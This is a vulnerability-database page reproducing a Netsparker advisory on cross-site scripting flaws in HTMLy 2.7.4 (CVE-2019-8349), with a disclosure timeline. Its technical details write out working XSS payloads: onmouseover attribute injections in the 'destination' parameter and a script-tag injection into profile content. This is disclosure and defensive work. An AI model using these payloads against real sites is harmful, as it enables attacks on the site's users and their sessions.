Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormOmar KurtPACKETSTORM:151733
HistoryFeb 18, 2019 - 12:00 a.m.

HTMLy 2.7.4 Cross Site Scripting

2019-02-1800:00:00
Omar Kurt
packetstormsecurity.com
31

0.004 Low

EPSS

Percentile

72.9%

JSON
`Multiple Cross-Site Scripting Vulnerabilities in HTMLy 2.7.4  
  
Information  
--------------------  
  
Advisory by Netsparker  
Name: Cross-Site Scripting Vulnerabilities in HTMLy 2.7.4  
Affected Software: HTMLy  
Affected Versions: 2.7.4  
Homepage: https://github.com/danpros/htmly  
Vulnerability: Cross-Site Scripting  
Severity: High  
Status: Not Fixed  
CVE-ID: CVE-2019-8349  
CVSS Score (3.0): CVSS:3.0/AV:A/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N  
Netsparker Advisory Reference: NS-18-059  
  
Technical Details  
--------------------  
  
URL http://ns.app/ScanApp/htmly/2018/04/test-image-post/delete?destination=x" onmouseover=netsparker(0x004191) x="   
Parameter Name destination  
Parameter Type GET  
Attack Pattern x%22+onmouseover%3dnetsparker(0x004191)+x%3d%22   
  
URL http://ns.app/ScanApp/htmly/2018/04/test-image-post/edit?destination=x" onmouseover=netsparker(0x00409D) x="   
Parameter Name destination  
Parameter Type GET  
Attack Pattern x%22+onmouseover%3dnetsparker(0x00409D)+x%3d%22   
  
URL http://ns.app/ScanApp/htmly/author/kanti   
Injection URL http://ns.app/ScanApp/htmly/edit/profile   
Parameter Name content  
Parameter Type POST  
Attack Pattern '"--></style></scRipt><scRipt>netsparker(0x005D63)</scRipt>  
  
For more information on cross-site scripting vulnerabilities read the article Cross-site Scripting (XSS).  
  
Advisory Timeline  
--------------------  
  
28th November 2018 - First Contact  
29th November 2018 - Details Sent  
23rd January 2019 - Last Attempt to Contact  
18th February 2019 - Advisory Released  
  
Credits & Authors  
--------------------  
  
These issues have been discovered by Omar Kurt while testing Netsparker Web Application Security Scanner.  
  
About Netsparker  
--------------------  
  
Netsparker web application security scanners find and report security flaws and vulnerabilities such as SQL Injection and Cross-site Scripting (XSS) in all websites and web applications, regardless of the platform and technology they are built on. Netsparker scanning engineas unique detection and exploitation techniques allow it to be dead accurate in reporting vulnerabilities. The Netsparker web application security scanner is available in two editions; Netsparker Desktop and Netsparker Cloud. Visit our website https://www.netsparker.com for more information.  
`

Related

osv 1
zdt 1
cve 1
prion 1
cvelist 1
nvd 1
osv
osv
CVE-2019-8349
2019-05-08 14:29:00
zdt
zdt
HTMLy 2.7.4 Cross Site Scripting Vulnerability
2019-02-18 00:00:00
cve
cve
CVE-2019-8349
2019-05-08 14:29:00
prion
prion
Cross site scripting
2019-05-08 14:29:00
cvelist
cvelist
CVE-2019-8349
2019-05-08 13:24:32
nvd
nvd
CVE-2019-8349
2019-05-08 14:29:00

0.004 Low

EPSS

Percentile

72.9%

JSON
Related for PACKETSTORM:151733
osv1zdt1cve1prion1cvelist1nvd1